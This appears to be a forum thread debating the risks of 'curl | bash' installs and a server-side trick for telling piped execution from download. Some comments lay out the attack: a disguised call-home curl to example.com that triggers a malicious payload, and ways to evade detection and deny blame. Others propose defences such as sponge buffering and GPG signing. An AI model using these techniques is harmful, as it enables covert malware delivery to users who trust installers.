The sleep cleverness is excessive though - what you really want to know is if the script you're returning is being executed as it's sent. If it is, then you can be pretty confident that a human isn't reading it line by line.
1. Send your response as transfer-encoding: chunked and tcp_nodelay
2. Send the first command as
curl www.example.com/$unique_id
Then the server waits before sending the next command - if it gets the ping from the script, we know that whatever is executing the script is running the commands as they're sent, and is therefore unlikely to be read by a human before the next command runs. If it doesn't ping within a second or so, proceed with the innocent payload.
For extra evil deniability, structure your malicious payload as a substring of a plausibly valid sequence of commands - then simply hang the socket partway through. Future investigation will make it look like a network issue.
You could even get more clever with this you could drop the unique_id and just match up the remote host IP. You could probably even disguise the command as something like a "network connectivity test" in the script.
# Check network connectivity so we can continue the install
if ! curl --fail www.example.com; then exit; fi
Of course, what actually is happening is that we've just informed the server to now serve our malicious code.
Remote host IP isn't ideal because of NAT (request from another host on the network exposes your malfeasance), or if your target may be using something like TOR (two requests might have differing remote IPs). But there's a bunch of tricks to get unique info out of a network request that you control the parameters to. Presumably there aren't that many concurrent invocations of your script, so only a few bits of entropy are actually required. Best way is probably to have a bunch of domains and make it look like they're various mirrors you're downloading binaries from - then it's not suspicious that it changes for different machines or requests.
If binaries are being downloaded, then the dynamically generated malicious script could pretend it's a checksum when really it's a unique tracking URL.
Well it's okay to not infect every target. In fact, if you are being malicious, it would be better to only infect some targets so as to muddy the waters when someone is trying to investigate your actions after the fact.
You can claim that you were MITM'd and point to the non-infectious cases as evidence that you always send a good payload.
note that `echo echo hi` is fully read, and then (and only then) passed to bash.
ditto for
echo -c "`curl <your url>`"
The curl command isn't detectable as an evaluation because it's fully spliced into the string, then sent to bash. It's easy to imagine setting up a `curl <url> | sponge | bash` middleman, too.
It is impossible in general to know what the downstream user is going to do with the bytes you send. Even bash happens not to cache its input. But technically it could -- it would be entirely valid for bash to read in a buffered mode which waits for EOF before interpreting.
You're of course correct that the general problem is unsolvable - but the goal is to opportunistically infect people who directly paste the "curl example.com/setup | bash" that's helpfully provided in your getting started guide, without serving an obviously malicious payload to someone who could be inspecting it.
I think the real message is that this is a new class of timing attack, and that it should be treated as such. E.g. curl itself needs to be updated to buffer its own output.
I disagree. Maybe a new tool that downloads and then runs a script from the interwebs needs to be written, but curl itself does one job and does it well.
Yet Another Package Manager :) Seriously - you're right, but people use curl | bash because it's super simple/fast and usually just works. Package managers can be an intimidating mess; even the choices we have in package managers confound things these days - did I install that with apt? snap? npm? pip? aw, crap that program I just installed with pip isn't working because I'd already installed a version with apt and some of it's configuration isn't compatible!!!
It's a mess. I really like snaps, but I hesitate for this reason - safer to default to apt on my ubuntu machine.
[edit] by safer I meant 'less likely for me to get confused and so screw up something', not meant as a security comment.
Hm. I tried and it does not seem to work. You can view my attempt at https://github.com/sethgrid/exploit. Chances are that I am ignorant of something. If someone knows what am doing wrong, please let me know!
The code starts to send chunked data and polls for a return curl call from the downloaded script. If the script's curl call calls home, the download will chunk out "bad" bash.
What I see happening is the downloaded script does not fully run until fully downloaded.
Fooling a human with bash is less difficult than you might imagine. I am fooled by bash code at least half the time I interact with a shell script I didn't write myself. A misleading comment plus an innocuous looking URL, coupled with the fact that an installation script can be expected to download files from the internet in order to install them would make this slip past nearly any reviewer.
On the evading detection side, one other simple way to avoid this is to add sponge[0] between curl and bash in the pipeline, i.e. curl ... | sponge | bash. sponge consumes all input until EOF before outputting anything, stopping bash from executing a partially downloaded script.
Just curl it to tee or redirect to a file and you know it won't change before you execute the script file.
There's nothing stopping somebody from even more trivially just sending each IP a benign script once (per curl user agent) and a malicious script the second time. Putting it in a file and executing the file brings it entirely into your domain of control.
So yes, curl bash can be dangerous. But it's just so darn convenient. And when it's coming from a very prominent trusted source like for Get Pip or Amazon AWS it's hard not to just go with.
Surely there's some compromise middle ground? Let me download "safe-curl-bash" (scb) that only runs a script if it's trusted in some manner? Maybe the checksum matches from a crowdsourced database.
"Sorry only 9 people have declared this script valid and your threshold is 100. Here's a cat of the script and we will ask you if it looks valid or not or don't know."
I also think it's a bit more realistic than the, "anyone who does this should be reading the script first to check that it's safe." Yes, and I check the passenger jet for flaws before I board, too!
> Yes, and I check the passenger jet for flaws before I board, too!
There is an entire infrastructure of people and processes in place to make sure that you don't have to check your passenger jet for flaws to be reasonably sure it's safe. No such infrastructure exists to protect you from the consequences of curl-bashing software off some random Web site.
No matter what you're putting 100% faith in the the server and the TLS connection. There are a lot of reasons to prefer packages, but I don't think security is one of them.
When RPM-GPG-EXAMPLE and example.rpm are both coming from https://example.com it's less clear. When example.com is coming from a mirror repository, or being emailed around (yes, this happens), package signing asserts that example.rpm was signed by the signatures in RPM-GPG-EXAMPLE, which has a strong (but not bullet-proof) connection as being built by example.com.
From that example, we can see that package signing also protects from someone who's able to break into the main example.com webserver but not example.com's build system - if the attackers did not get into the build system and example.rpm has a valid signature then despite the webserver being broken, the rpm file can still be trusted, assuming the webserver did not have a copy of the private key used for build signing. If we loaded https://example.com/RPM-GPG-EXAMPLEbefore the webserver was broken into, and then the webserver was broken into and a malicious RPM-GPG-EXAMPLE and example.rpm were uploaded, it would be noticed. (Examining changes to RPM-GPG-EXAMPLE are, unfortunately, left to the reader as an exercise.)
Still, while it's true that loading the file from https://example.com/RPM-GPG-EXAMPLE relies on TLS, but there are methods available to confirm that the file's contents are valid, that don't rely on TLS, if the security folk at example.com are doing their job.
Finally, TLS is not an all or nothing game. Or rather, the certificate used to sign the https connection does not have to be blindly trusted, and in the case of sketchy root certificates, even if https://example.com loads fine in a web browser, it does not mean it should necessarily be trusted. Certificate Transparency (eg crt.sh) is a proper lever when working with example.com.
Security is complicated and there are no silver bullets.
Say I already trust packages.redhat.com and install rpms regularly from it. I likely already have trusted their key.
Now packages.redhat.com gets hacked - if hacker also stole private key used for signing packages and replaced the RPMs. I will get warning/error while installing rpms (which I admit most users will ignore) but a curl|bash kinda defeats the point of package signing too.
Who are these "most people". I've never seen curl | bash outside of developer circles. "Most" people install things directly from the app store, or use web apps.
Good use case for IPFS. You could curl a hash and check that hash against signatures commited to a blockchain. If the set of signatures exist that you trust, then it's golden, if not, no exec.
Security and convenience are almost always a difficult tradeoff. In the case of curl'ing scripts from trusted websites, what is the benefit for the average lazy user? Are you using an OS that doesn't have a signed package with the same library/program?
It's not trust now that you need to worry about. It's trust later, when curl-bash is part of an automated pipeline that no one pays attention to.
Your solution depends on third parties checking the script or going based on some knowledge of "trusted sources." That has nothing to do with this hack, which exploits those who are "verifying" the script themselves before executing it.
The simple solution here is not to use curl/execute with a pipe. Just wget to save the file and check it locally (rather than through a browser) before executing.
I think the arch user repo does this correctly by asking, "do you want to edit the packagebuild?" You can just press n to accept defaults, or y to take a look under the hood and make edits before continuing.
Preventing the bad guy from "validating" his own script a million times is difficult. At the end of the day, I think security basically has to come from "I trust the website that I'm on."
Neat! But it's not obviously a bad idea. You have a TLS connection with the site you're downloading from. `curl | bash` is no worse than downloading a .dmg or .deb from the same server would be.
> You have a TLS connection with the site you're downloading from. `curl | bash` is no worse than downloading a .dmg or .deb from the same server would be.
This site's argument is that the software publisher can selectively attack users during a live software install, in a way that they don't stand a chance of detecting by inspection (or of having proof of after the fact).
I mean, I guess I see them making a three-stage argument:
1) Distributing software via bash script is a bad idea
2) Sensible people review the bash scripts they downloaded before running them
3) But haha! Here is a clever trick that evades that review.
And I'm not persuaded by 3) being interesting because I already rejected 1) and 2), and I consider 3) to just be proving my point -- you (for all you!) are not competent to perform a very brief but somehow thorough security review of a shell script that probably has further dependencies you aren't even looking at, and the actual reasoning to apply when deciding to install software this or any way is purely "Do I trust the entity I have this TLS connection open with to run code on my machine?".
I agree with im3w1l's point: if everyone runs the same install script, it's a lot riskier for the publisher to attack everywhere. If people run individualized scripts, it's a lot less risky.
I think there's a difference between trusting an organization's code that is published to the general public, and trusting an organization to send you arbitrary code in a specific moment. Only software distribution methods can enforce this kind of distinction, and curl | bash by itself doesn't, particularly in light of the article's technique.
I tried to discuss this distinction in some of my reproducible builds talks. There's a difference between trusting Debian to publish safe OS packages, and trusting Debian to send you a safe package when you run a package manager if the package could easily be different every time. This is particularly so when someone may be able to compromise the software publisher's infrastructure, or when a government may be able to compel the software publisher to attack one user but other users.
Instead of your (1) and (2) above, how about this?
1) Distributing software via a method that can single out particular users and groups to receive distinctive versions is a bad idea: it increases the chance that some users will actually be attacked via the software publication system.
2) We might think that curl | bash isn't particularly egregious this way, because there are various ways that publishers might get caught selectively providing malicious versions. This is especially so because the publishers can't tell whether a curl connection is going to run the installer or simply save it to disk. That makes the publishers (or other people who could cause this attack to happen) less likely to do it.
3) But haha! Here is a clever trick that restores the publishers' ability to distinguish between running and saving the installer, and in turn breaks the most plausible ways that publishers could get caught doing this.
Edit: Elsewhere in this thread you suggested that the likeliest alternative is something like
I think I'd agree that this has some of the same problems, although it might have some advantages because of the potential decoupling between the distribution of the signing key and the distribution of the signed package. As another commenter pointed out, you could try to use a different channel to get or verify the key, and some users actually do; also, you'll have a saved copy of the key afterward.
I agree that the distributor having control over offering different artifacts to different individuals is very risky.
I was assuming that the sites that you might `curl | bash` from are third-party sites (i.e. not your Linux distribution) that you don't have an existing trust relationship with, which makes it impossible to avoid this capability. That's the situation people use curl | bash in.
So I think this ability to individualize artifacts would still be present if we were receiving a .deb or apt key instead from that site.
> you'll have a saved copy of the key afterward
Yes, though since dpkg post-install scripts can modify arbitrary files (right?), you can't trust that any files on your disk are the ones that existed before the compromise. So couldn't the malicious key verify the malicious package, which then overwrites the copy of the package and key on-disk with the good versions that were given to everyone else?
> So I think this ability to individualize artifacts would still be present if we were receiving a .deb or apt key instead from that site.
I guess we need some other infrastructure or social practice on top in order to compare what different people see, and/or allow the distributor to commit to particular versions. (Then having the distributor not know whether someone is blindly installing a particular file without verification is necessary, but not sufficient, to deter this kind of attack.)
(a compromise of github itself would be needed) - it's easy to imagine one of the many mirrors of Debian to suffer from compromise. But as they just push signed debs, the damage would be limited (not trivial, there could conceivably be bugs in apt/dpkg/gnupg etc).
If you are running the same script as everyone else, then then there is a good chance someone else will notice if something is off. If everyone is potentially given their own personalized script then this safety in numbers strategy doesn't work.
If you know you are running the standard scripts that everyone runs, then it also makes a post-breach investigation more easy. You know the exact scripts you ran as opposed to knowing "well I curl | bashed from these sites so one of them might be bad".
There's nothing stopping people from being served different content with packages. Hell, n users could receive n different packages which all pass the GPG check. And since you're getting your checksum from the same site it would look like it had the right checksum too. You would have to find other people you trust to compare it to but since everything appears to be above board why would you even think to do that?
Either you trust the entity you're downloading software from or you don't.
Linux/BSD distribution mirrors don't control the package signing keys, maintainers do. Similarly, Google doesn't possess the ability to push out updates for third-party apps, without fundamentally redesigning the OS with a platform update, because the signing keys are owned by the app developers, and the existing OS rejects updates signed with different keys. In both of these situations, the key owners lack the ability to selectively push out signed updates, unless they also control the distribution infrastructure.
The argument is predicated in the assumption that some subset of people are checking the installer before running it, whether that installer be a shell script or a binary package.
With the binary packages you don’t have any way to tell if the consumer is going to inspect it or not, so even if you send the malicious code to only a subset of people, there is a risk of detection.
The technique in the post allows you to distribute the malicious code only to people who aren’t inspecting it with a much higher success rate.
Personally I’m dubious that anyone is inspecting any installers with enough expertise and scrutiny to protect the rest of us, so the differences between the install methods in this regard are negligible.
>in a way that they don't stand a chance of detecting by inspection (or of having proof of after the fact)
What do you mean? They could `tee` curl output to a file (or elsewhere, for archives). They could also suspend passing the output to bash until they've verified the output (perhaps they would run a hash function and compare the result).
Alice and Bob are both installing something on their computers. It is available as both a .deb and via "curl | bash". It is not malicious...but it does turn out to have a serious bug.
They both install, and both hit the bug and find that it has completely and utterly broken their network configurations bad enough that they have no network access at all.
Alice installed via the .deb. She can look at the scripts in the .deb and see what it was messing with, which gives her a big head start on figuring out how to fix it at least enough to connect to the network backup server and fully restore her network configuration.
Bob installed via "curl | bash". Bob is now left using find to look for recently changed configuration files, and paging through the out of date O'Reilly books he has from the old days when programmers owned physical books, trying to remember enough about network configuration to recognize what is wrong.
Trustworthy sites do not serve you malicious code. They often will, however, serve you buggy code.
The difference is that you can inspect it before you run it if you download it. If you pipe it into bash you don’t know what you’re getting, even if you previously inspected the data provided by that URL.
I don't feel the need to review the source code for every install script I run.
I don't read the source code for almost any of the code on my machine today. In most cases where I see `curl | bash`, I'd probably already be screwed even if I review it. Most install scripts and up doing "hit website, install thing" anyways - am I reviewing the second stage install script also?
That's a way in which "curl | bash" distributed software is better than .deb/.dmg distributed software, right? Because you have the potential to inspect the script first, if you have some kind of ridiculous confidence in your ability to perform security review of an entire software product in the moments before you decide to install it.
But it's never presented in that way, as a feature. It's presented as a terrible way to distribute software.
It doesn't take ridiculous confidence to analyze shell scripts. In the hundreds of scripts I have read, few were more than 100 lines long. It shouldn't take more than 60 seconds (probably 30 or less) to mentally build a list of all possible operations a short script can perform. Bourne shell scripts don't have much room to hide surprising behavior, and when they do, it immediately stands out. If they are permanently installed, and invoked later by other parts of the system, then they may need more probing, but we're talking about installation scripts.
.deb and .dmg can be easily extracted. The former is just an `ar` archive containing tarballs, which you can (and should) extract to read the install scripts. (.dmg specifics escape me, since I only dealt with them one time, years ago.)
Binary code isn't inscrutable. Some good tools for this are, among many, many more, IDA, Hopper, and radare2. How long this takes depends on what your goals are, how comprehensive you are, and the program complexity. I don't think I've yet spent years on one project, fortunately, but the months-long efforts, for undoing some once-prominent copyright protection systems, were pretty brutal. Smaller programs have taken me just several hours to appropriately examine.
deb/rpm is better because it's usually signed by maintainer with GPG keys. I think that it's harder to steal keys from maintainer than to infiltrate web server.
Quote(trying to fit it to narrow widt, for others on mobile):
curl -s \
'https://pgp.mit.edu/pks/lookup?op=get&search=0x1657198823E52A61'
| gpg --import \
&& if z=$(curl -s 'https://install.zerotier.com/' | gpg);
then echo "$z"
| sudo bash;
fi
It's interesting - it tries to import a given gpg key from keyserver, then grabs a gpg armored text file with a bash header - with the gpg header wrapped in a here-document:
#!/bin/bash
<<ENDOFSIGSTART=
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
ENDOFSIGSTART=
I'm unsure, but I think you could just stick your malicious code before the signature?
So it really isn't any better, as far as I can tell. There's also a trade-off between scripts that can be typed (curl https://i.com.com) and need copy-pasting - as copy-pasting also isn't safe - even if that's a somewhat different attack vector (compromising the web site, altering js depending on visitor).
I don't think there are very meaningful differences in the security properties -- I don't think it's more difficult to become compromised by one than by one of the others.
No, you're deliberately choosing a bad way to get a key to try to prove your point. You shouldn't be fetching a key from the site that might be compromised.
> You shouldn't be fetching a key from the site that might be compromised.
You shouldn't, but people do, and are being directed to do so increasingly as Linux becomes more popular. Software developers want to be software publishers so bad that they're just going to keep pushing, and therein lies the risk: If people get the impression that packages are somehow more secure than shell scripts, then these kinds of attacks will simply become more prevalent.
To you it's obvious that packages aren't more secure, it's how you get them that makes their normal use more secure. That's apparently too subtle a point for even big companies like Microsoft.
1. Walled Garden: Developers don't self-publish. Call it an app store, call it everything-in-apt.
2. Encapsulate everything so that developers can't do anything. Don't use anything unless it comes in a docker instance. Or a FreeBSD jail. Or something else. Qubes maybe.
No, there's no effective difference between those examples, apart from maybe post mortem analysis. It's also a poor method of key discovery, as hueving said.
Where do you get the keyserver ID? From the website? You're back to square one, because anyone can upload anything to a keyserver. If they can modify the website (change files, etc) they can also change the keyserver ID they're telling people to use.
The "antipattern" is letting/expecting software developers also be software publishers.
This is a good point, which should be brought up more. Although you probably meant key id or key fingerprint, not keyserver ID, which would imply something else.
You're supposed to do additional verification of PGP keys, either through attending key signing parties (who does that in 2018?), checking the signatures of people you already trust, or comparing as much out-of-band information as you can.
It's not terribly hard to create a plausibly trusted keyring from scratch that depends on only 1 of 3 websites being legitimate. For example:
All keys are cross signed as shown by gpg2 --list-signatures.
If this sounds like a pain in the ass, it's because it is, and GPG could be so much better.
Ironically, if you can't acquire the developer's public signing key, it might be best to install software directly from their website, if no trusted repositories are available. If you can acquire their signing key, it's probably best to not install software directly from their website, in order to avoid selective distribution attacks. Sort of unintuitive.
Public keyservers are well-known, and in a different security domain than the download server. Without breaking in, a rogue party can't delete or replace keys from the keyservers.
Aren't keyserver lookups usually keyed off a 32-bit key ID though? (Whose space isn't big enough to avoid someone brute-force generating a key with a certain key ID s.t. you think you got the right key.) You're supposed to check the fingerprint, but you need to get the fingerprint, and for that you need a secure channel, and you're right back to square one.
Of course an unsigned key missing from the keyservers still has the advantage that on subsequent installs/updates, the previously downloaded key persists.
And you can keep the initially downloaded key in your CI configs.
dpkg doesn't stop you overwriting system files in a post-install shell script, as far as I know? Which is the way that a malicious package would choose to do it. I don't think dpkg performs any meaningful security review in the way you describe.
Would you like me to craft you a .deb/.rpm which totally trashes your system? Packages can and very often do leverage the ability to run arbitrary scripts but nothing says I can't do serious damage even without that.
Oh, yeah - good luck getting the average layperson or even many sysadmins to inspect this - because very few people actually know how to review scriptlets in an RPM (rpm -qp —scripts package.rpm, isn’t this nice and obvious?). Nobody bothers for packages distributed via yum repositories either, because manually downloading packages to review them defeats the purpose, right?
Yeah, everything is vulnerable at the end of the day - but at least with packages one is less likely to get seriously messed with, just not impervious to it.
That's the point. It's also possible that the remote script has been altered in the meantime. Therefore it's never advisable to download the script again after inspection.
Half the problem with `curl | bash` installation is not related to whether or not you trust what your downloading...
The more important reason why it is a _horrible_ _stupid_ mechanism for software installation is that it is not _repeatable_.
It is well understood that casual .deb .rpm usage requires an equivalent level of trust as downloading anything else off the internet... but they have the added advantage of being _consistent_ _repeatable_ and _mirrorable_... I can copy the entire repository of any version of debian I want to my local file server, and use that to spin up however much infrastructure I want. And the only person I need to rely on after I have fetched the initial packages is myself.
Plenty of those scripts simply detect your operating system and then interact with the system package manager (adding a new repository, updating the package index, then asking the package manager to install it).
I would far prefer that software projects assumed competence in the installers knowledge of their systems package manager and just listed the specifics... honestly how hard is it to just say "here is our $gpg key" "here is our $apt_repo_url" the package name is "$foobar". And let competent system admins take it from there. Most of the time you end up de-composing the scripts into ansible/$sys_automation_tool_of_the_week anyhow.
Because your $apt_repo_url is useless to a yum user.
The package management community needs to stop balkanizing.
How else do you propose releasing software to all Unix-like OSes without learning a half dozen package manager formats and quirks? Only other choice is a container.
Sure, but that's harder to hide. Any user could paste somewhere where nothing gets executed and the expose the hack attempt. Pipe to bash has the interesting aspect of letting the author inject hacks only to people who are not looking.
Anyway, the use case for my runck utility is scripts such as dockefiles or CI automation where I want to download and run installers and I don't want to reduce the bash boilerplate.
I always read the code first, but many times there's additional curl > bash and if I check that url there are yet more curl > bash several layers deep with branches. And they want me to run this as root ...
Regardless of the installation method it sounds like we need to be running all applications in their own individual virtual machines (e.g. Qubes OS) or within a restricted environment with limited permissions (iOS)
Worse, what happens when I do want the applications to communicate?
An amusing gotcha I found with docker was how do I convince the servers I communicate with from in the container that I am me? Best bet was to map my user into the user on the container, but that was actually ridiculously fraught with trouble. (There is a chance this has since been fixed...)
QubeOS adopted the "manual authentication" method (of having to confirm everything, such as clipboard copy/paste).
This is probably not quite scalable (not to mention annoying). May be there's some way to have a short session token, so during a work session of a few hours, it works without any intervention.
The problem came when I wanted the app to communicate to another on behalf of me. Do I have to constantly reconfigure an openid connection for every app on my machine? (Not the worst of ideas, I suppose...)
> a knowledgable user will most likely check the content first
Really? Are they going to read every line of code and every line of code in every dependency that the install script installs?
The bash detection is clever but I think its a solution to a problem that doesn't exist.. Its already very easy to install hide malicious code in plain sight, why go to all this trouble to detect if the user is piping to bash?
For example, see how easy it is to publish a fake npm package or a .deb package:
The obsession against shell pipes is so absolutely absurd. You’d download a dmg and drag it to your apps but not shell pipe? You’ll sudo dpkg -i but not a shell pipe?
Can anyone point to a single case of a shell pipe ever being abused ever?
I'd like to point out that the author is not directly discrediting shell pipes.
> a knowledgable user will most likely check the content first
The obvious workaround would be to download with curl, inspect, then run the virtually same inspected file through bash. This workflow is easier without necessarily using pipes. Package files can also be inspected before running and are not directly inspected in the browser.
Trust on the other hand is more complicated. Without doing tedious manual inspecting, you have to rely on the distributor. In this case, public keys aid in this regard, but also does not work with the `curl | bash` workflow.
I use curl and bash to launch a script I wrote to install my versioned home files, and it is worth to use this method. It depends on what you need, in my use case is really comfortable. It is a matter of trust.
You could prevent the detection by wrapping contents in a block, so Bash reads it entirely before evaluating it: `safe_curl() { printf "{\n"; curl "$@"; printf " \n}"; }`
The idea is to distinguish between "curl http://x" and "curl http://x | bash", in order to only give malicious content when the user pipes it straight to bash (presumably they aren't looking at the content in this case).
1. Send your response as transfer-encoding: chunked and tcp_nodelay
2. Send the first command as
Then the server waits before sending the next command - if it gets the ping from the script, we know that whatever is executing the script is running the commands as they're sent, and is therefore unlikely to be read by a human before the next command runs. If it doesn't ping within a second or so, proceed with the innocent payload.For extra evil deniability, structure your malicious payload as a substring of a plausibly valid sequence of commands - then simply hang the socket partway through. Future investigation will make it look like a network issue.